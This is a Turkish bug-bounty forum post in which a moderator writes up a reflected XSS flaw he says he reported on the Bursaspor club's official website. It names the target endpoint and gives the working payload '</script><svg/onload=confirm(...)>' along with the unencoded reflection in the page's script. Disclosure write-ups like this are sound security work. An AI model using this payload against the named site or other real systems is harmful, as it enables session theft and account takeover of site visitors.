Neler yeni
Kullanıcı:
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

XSS vakaları analiz Bursaspor

1atakan1

1atakan1

https://www.linkedin.com/in/atakan-ozbudak/
Moderator
Avcı
Katılım
2 Ocak 2026
Mesajlar
55
Tepkime puanı
185
Puan
33
Merhaba Bughanê Üyeleri!
Bugün Bursaspor resmi web sitesinde (bursaspor.org.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiz ile paylaşıyorum.

ZAFİYET DETAYLARI

  • Hedef: https://www.bursaspor.org.tr
  • Parametre: bs (URL path üzerinden yansıyor)
  • Endpoint: /bs/haber
  • Tip: Reflected Cross-Site Scripting (XSS)
  • PAYLOAD:</script><svg/onload=confirm('ATAKAN')>
  • Etkisi: Session Hijacking / Keylogger / Phishing / Account Takeover


Çalışma Mantığı:

Kullanıcıdan alınan veri, sayfa içerisinde JavaScript kodu içinde herhangi bir filtreleme veya encode işlemi uygulanmadan doğrudan yansıtılmaktadır.

JavaScript: 
<script type="text/javascript">
var url = "bs=haber</script><svg/onLoad=confirm('ATAKAN')>&kategori=21&zaman=&sayfa=2";
</script>

1773842196917.jpg
 
Cevap yazmak için giriş yap yada kayıt ol.
Geri
Üst